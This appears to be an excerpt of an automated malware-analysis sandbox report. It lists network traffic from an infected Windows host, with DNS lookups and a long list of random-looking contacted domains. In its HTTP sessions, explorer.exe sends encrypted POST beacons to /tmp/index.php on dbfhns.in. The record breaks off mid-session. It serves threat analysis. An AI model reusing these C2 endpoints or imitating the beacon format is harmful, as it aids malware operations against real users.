                                                                              May 26, 2024 10:25:11.186208963 CEST8052738185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:11.186455011 CEST5273880192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:11.186455011 CEST5273880192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:11.186582088 CEST5273880192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:11.240886927 CEST8052738185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:11.291532040 CEST8052738185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:12.106934071 CEST8052738185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:12.111613989 CEST8052738185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:12.111825943 CEST5273880192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:12.111826897 CEST5273880192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:12.164419889 CEST8052738185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:16.436652899 CEST5273980192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:16.590189934 CEST8052739185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:16.590383053 CEST5273980192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:16.590425968 CEST5273980192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:16.590435982 CEST5273980192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:16.600128889 CEST8052739185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:16.651616096 CEST8052739185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:17.742655993 CEST8052739185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:17.747401953 CEST8052739185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:17.747632027 CEST5273980192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:17.747632027 CEST5273980192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:17.804409981 CEST8052739185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:22.034235001 CEST5274080192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:22.039762020 CEST8052740185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:22.040004969 CEST5274080192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:22.040106058 CEST5274080192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:22.040106058 CEST5274080192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:22.092696905 CEST8052740185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:22.143673897 CEST8052740185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:22.960156918 CEST8052740185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:22.964894056 CEST8052740185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:22.965066910 CEST5274080192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:22.965066910 CEST5274080192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:23.020639896 CEST8052740185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:29.332760096 CEST5274180192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:29.338433981 CEST8052741185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:29.338633060 CEST5274180192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:29.338723898 CEST5274180192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:29.338725090 CEST5274180192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:29.388528109 CEST8052741185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:29.439366102 CEST8052741185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:30.271692991 CEST8052741185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:30.276397943 CEST8052741185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:30.276602030 CEST5274180192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:30.276602030 CEST5274180192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:30.328679085 CEST8052741185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:34.557312012 CEST5274280192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:34.562742949 CEST8052742185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:34.563023090 CEST5274280192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:34.563116074 CEST5274280192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:34.563116074 CEST5274280192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:34.616667986 CEST8052742185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:34.668554068 CEST8052742185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:35.492666006 CEST8052742185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:35.499938965 CEST8052742185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:35.500179052 CEST5274280192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:35.500180006 CEST5274280192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:35.552556992 CEST8052742185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:39.800482035 CEST5274380192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:39.805809021 CEST8052743185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:39.805915117 CEST5274380192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:39.806022882 CEST5274380192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:39.806057930 CEST5274380192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:39.856565952 CEST8052743185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:39.907675982 CEST8052743185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:40.744919062 CEST8052743185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:40.749500990 CEST8052743185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:40.749603987 CEST5274380192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:40.749701023 CEST5274380192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:40.800848961 CEST8052743185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:47.422940969 CEST5274480192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:47.428436041 CEST8052744185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:47.428544998 CEST5274480192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:47.428708076 CEST5274480192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:47.428708076 CEST5274480192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:47.480669975 CEST8052744185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:47.527640104 CEST8052744185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:48.374391079 CEST8052744185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:48.379055023 CEST8052744185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:48.379148006 CEST5274480192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:48.379229069 CEST5274480192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:48.436537027 CEST8052744185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:52.699563980 CEST5274580192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:52.704807997 CEST8052745185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:52.705023050 CEST5274580192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:52.705023050 CEST5274580192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:52.705023050 CEST5274580192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:52.756721973 CEST8052745185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:52.807616949 CEST8052745185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:53.651457071 CEST8052745185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:53.656203032 CEST8052745185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:53.656300068 CEST5274580192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:53.656373978 CEST5274580192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:53.708368063 CEST8052745185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:58.709527969 CEST5274680192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:58.714689970 CEST8052746185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:58.714832067 CEST5274680192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:58.714999914 CEST5274680192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:58.715032101 CEST5274680192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:58.768685102 CEST8052746185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:58.815562963 CEST8052746185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:59.643886089 CEST8052746185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:59.648629904 CEST8052746185.18.245.58192.168.2.4
                                                                              May 26, 2024 10:25:59.648711920 CEST5274680192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:59.648791075 CEST5274680192.168.2.4185.18.245.58
                                                                              May 26, 2024 10:25:59.700453043 CEST8052746185.18.245.58192.168.2.4

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              May 26, 2024 10:22:20.777978897 CEST5181253192.168.2.41.1.1.1
                                                                              May 26, 2024 10:22:21.781243086 CEST5181253192.168.2.41.1.1.1
                                                                              May 26, 2024 10:22:22.997822046 CEST5181253192.168.2.41.1.1.1
                                                                              May 26, 2024 10:22:23.139874935 CEST53518121.1.1.1192.168.2.4
                                                                              May 26, 2024 10:22:23.144839048 CEST53518121.1.1.1192.168.2.4
                                                                              May 26, 2024 10:22:23.144891024 CEST53518121.1.1.1192.168.2.4
                                                                              May 26, 2024 10:22:33.956954002 CEST5216353192.168.2.41.1.1.1
                                                                              May 26, 2024 10:22:33.970920086 CEST53521631.1.1.1192.168.2.4
                                                                              May 26, 2024 10:22:42.587862968 CEST5353053162.159.36.2192.168.2.4
                                                                              May 26, 2024 10:22:43.121030092 CEST53530081.1.1.1192.168.2.4
                                                                              May 26, 2024 10:23:07.353275061 CEST5015153192.168.2.41.1.1.1
                                                                              May 26, 2024 10:23:07.364315987 CEST53501511.1.1.1192.168.2.4
                                                                              May 26, 2024 10:24:54.770073891 CEST6151653192.168.2.41.1.1.1
                                                                              May 26, 2024 10:24:55.765544891 CEST6151653192.168.2.41.1.1.1
                                                                              May 26, 2024 10:24:55.772854090 CEST53615161.1.1.1192.168.2.4
                                                                              May 26, 2024 10:24:57.646894932 CEST53615161.1.1.1192.168.2.4

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              May 26, 2024 10:22:20.777978897 CEST192.168.2.41.1.1.10xe333Standard query (0)dbfhns.inA (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:22:21.781243086 CEST192.168.2.41.1.1.10xe333Standard query (0)dbfhns.inA (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:22:22.997822046 CEST192.168.2.41.1.1.10xe333Standard query (0)dbfhns.inA (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:22:33.956954002 CEST192.168.2.41.1.1.10xf4f8Standard query (0)whispedwoodmoodsksl.shopA (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:23:07.353275061 CEST192.168.2.41.1.1.10xde66Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:24:54.770073891 CEST192.168.2.41.1.1.10x60beStandard query (0)dbfhns.inA (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:24:55.765544891 CEST192.168.2.41.1.1.10x60beStandard query (0)dbfhns.inA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              May 26, 2024 10:22:23.139874935 CEST1.1.1.1192.168.2.40xe333No error (0)dbfhns.in190.28.110.209A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:22:23.139874935 CEST1.1.1.1192.168.2.40xe333No error (0)dbfhns.in187.134.55.166A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:22:23.139874935 CEST1.1.1.1192.168.2.40xe333No error (0)dbfhns.in186.101.193.110A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:22:23.139874935 CEST1.1.1.1192.168.2.40xe333No error (0)dbfhns.in185.18.245.58A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:22:23.139874935 CEST1.1.1.1192.168.2.40xe333No error (0)dbfhns.in88.225.215.104A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:22:23.139874935 CEST1.1.1.1192.168.2.40xe333No error (0)dbfhns.in211.181.24.133A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:22:23.139874935 CEST1.1.1.1192.168.2.40xe333No error (0)dbfhns.in95.86.30.3A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:22:23.139874935 CEST1.1.1.1192.168.2.40xe333No error (0)dbfhns.in84.252.15.104A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:22:23.139874935 CEST1.1.1.1192.168.2.40xe333No error (0)dbfhns.in116.58.10.59A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:22:23.139874935 CEST1.1.1.1192.168.2.40xe333No error (0)dbfhns.in211.181.24.132A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:22:23.144839048 CEST1.1.1.1192.168.2.40xe333No error (0)dbfhns.in190.28.110.209A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:22:23.144839048 CEST1.1.1.1192.168.2.40xe333No error (0)dbfhns.in187.134.55.166A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:22:23.144839048 CEST1.1.1.1192.168.2.40xe333No error (0)dbfhns.in186.101.193.110A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:22:23.144839048 CEST1.1.1.1192.168.2.40xe333No error (0)dbfhns.in185.18.245.58A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:22:23.144839048 CEST1.1.1.1192.168.2.40xe333No error (0)dbfhns.in88.225.215.104A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:22:23.144839048 CEST1.1.1.1192.168.2.40xe333No error (0)dbfhns.in211.181.24.133A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:22:23.144839048 CEST1.1.1.1192.168.2.40xe333No error (0)dbfhns.in95.86.30.3A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:22:23.144839048 CEST1.1.1.1192.168.2.40xe333No error (0)dbfhns.in84.252.15.104A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:22:23.144839048 CEST1.1.1.1192.168.2.40xe333No error (0)dbfhns.in116.58.10.59A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:22:23.144839048 CEST1.1.1.1192.168.2.40xe333No error (0)dbfhns.in211.181.24.132A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:22:23.144891024 CEST1.1.1.1192.168.2.40xe333No error (0)dbfhns.in190.28.110.209A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:22:23.144891024 CEST1.1.1.1192.168.2.40xe333No error (0)dbfhns.in187.134.55.166A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:22:23.144891024 CEST1.1.1.1192.168.2.40xe333No error (0)dbfhns.in186.101.193.110A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:22:23.144891024 CEST1.1.1.1192.168.2.40xe333No error (0)dbfhns.in185.18.245.58A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:22:23.144891024 CEST1.1.1.1192.168.2.40xe333No error (0)dbfhns.in88.225.215.104A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:22:23.144891024 CEST1.1.1.1192.168.2.40xe333No error (0)dbfhns.in211.181.24.133A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:22:23.144891024 CEST1.1.1.1192.168.2.40xe333No error (0)dbfhns.in95.86.30.3A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:22:23.144891024 CEST1.1.1.1192.168.2.40xe333No error (0)dbfhns.in84.252.15.104A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:22:23.144891024 CEST1.1.1.1192.168.2.40xe333No error (0)dbfhns.in116.58.10.59A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:22:23.144891024 CEST1.1.1.1192.168.2.40xe333No error (0)dbfhns.in211.181.24.132A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:22:33.970920086 CEST1.1.1.1192.168.2.40xf4f8No error (0)whispedwoodmoodsksl.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:22:33.970920086 CEST1.1.1.1192.168.2.40xf4f8No error (0)whispedwoodmoodsksl.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:23:07.364315987 CEST1.1.1.1192.168.2.40xde66No error (0)steamcommunity.com104.102.42.29A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:24:57.646894932 CEST1.1.1.1192.168.2.40x60beNo error (0)dbfhns.in88.225.215.104A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:24:57.646894932 CEST1.1.1.1192.168.2.40x60beNo error (0)dbfhns.in211.181.24.133A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:24:57.646894932 CEST1.1.1.1192.168.2.40x60beNo error (0)dbfhns.in95.86.30.3A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:24:57.646894932 CEST1.1.1.1192.168.2.40x60beNo error (0)dbfhns.in84.252.15.104A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:24:57.646894932 CEST1.1.1.1192.168.2.40x60beNo error (0)dbfhns.in116.58.10.59A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:24:57.646894932 CEST1.1.1.1192.168.2.40x60beNo error (0)dbfhns.in211.181.24.132A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:24:57.646894932 CEST1.1.1.1192.168.2.40x60beNo error (0)dbfhns.in190.28.110.209A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:24:57.646894932 CEST1.1.1.1192.168.2.40x60beNo error (0)dbfhns.in187.134.55.166A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:24:57.646894932 CEST1.1.1.1192.168.2.40x60beNo error (0)dbfhns.in186.101.193.110A (IP address)IN (0x0001)false
                                                                              May 26, 2024 10:24:57.646894932 CEST1.1.1.1192.168.2.40x60beNo error (0)dbfhns.in185.18.245.58A (IP address)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • whispedwoodmoodsksl.shop
                                                                              • steamcommunity.com
                                                                              • 65.109.242.59
                                                                              • xdtlvnnwnlpkuygk.com
                                                                                • dbfhns.in
                                                                              • ytvhsyvyrbixtfi.org
                                                                              • txpgggtypbkripei.org
                                                                              • nwyllkfdfrdb.com
                                                                              • jpbahollcwbghe.com
                                                                              • oygcwhbcxoopv.com
                                                                              • 45.129.96.86
                                                                              • fjtoifbsexibjqos.org
                                                                              • eaiecpphhehnp.com
                                                                              • ohbpdxbbqxsqjiv.net
                                                                              • thknwrjryktui.org
                                                                              • 23.145.40.124
                                                                              • 185.235.137.54
                                                                              • mrnhbbwrygn.com
                                                                              • uhruuiuofju.org
                                                                              • 91.202.233.231
                                                                              • gdrusktiywhw.net
                                                                              • dswkxseehrq.com
                                                                              • etlthdykpik.net
                                                                              • urrnadxnpwvv.com
                                                                              • hnoddeyuysdltft.com
                                                                              • djnjnheylgenw.org
                                                                              • mvirbkubtmy.com
                                                                              • ukxbtouqvjwpgrb.net
                                                                              • lttuitxyemp.net
                                                                              • haljhouhmvighpi.com
                                                                              • bkjyrxsoflynogyv.org
                                                                              • iymhuqeqmdev.com
                                                                              • rscrbtwfrpl.net
                                                                              • feebaxojoajqvghx.net
                                                                              • flowliaawjqccjvx.com
                                                                              • dnklpspcfvmivsa.net
                                                                              • juuhlbwtemhw.net
                                                                              • uipcoqrcfmpaso.com

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.449736190.28.110.209802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 26, 2024 10:22:23.170190096 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://xdtlvnnwnlpkuygk.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 125
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:22:23.170191050 CEST125OUTData Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 40 0f e0 e1
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA .[k,vu@iOsgRgEVq(6c_x3
                                                                              May 26, 2024 10:22:24.188839912 CEST152INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:22:24 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 04 00 00 00 72 e8 85 ec
                                                                              Data Ascii: r


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.449737190.28.110.209802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 26, 2024 10:22:24.295938969 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://ytvhsyvyrbixtfi.org/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 239
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:22:24.295989990 CEST239OUTData Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 50 5e d8 81
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA -[k,vuP^Uhf!8E$8n.JOp!EW\'},!lY)DLv!~?J3d)LHu:VUk^
                                                                              May 26, 2024 10:22:25.494138956 CEST484INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:22:25 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.449738190.28.110.209802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 26, 2024 10:22:25.599878073 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://txpgggtypbkripei.org/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 309
                                                                              Host: dbfhns.in
                                                                              May 26, 2024 10:22:25.599878073 CEST309OUTData Raw: 3b 6e 53 64 82 bf 6c 2f d7 af c6 04 0e 74 0b c9 0a 0b b9 e2 63 00 94 12 0a 79 7f 96 48 ca c5 6f e9 5c b2 2d 03 68 57 10 e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 4b 5d d0 aa
                                                                              Data Ascii: ;nSdl/tcyHo\-hW? 9Yt M@NA -[k,vuK]{6U65+yLCdVwc],}Z:bnL43E'..\B^|:@i:!xQ)Rvsa,Pk
                                                                              May 26, 2024 10:22:26.634282112 CEST484INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sun, 26 May 2024 08:22:26 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.449739190.28.110.209802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 26, 2024 10:22:26.743766069 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://nwyllkfdfrdb.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 181
                                                                              Host: dbfhns.in
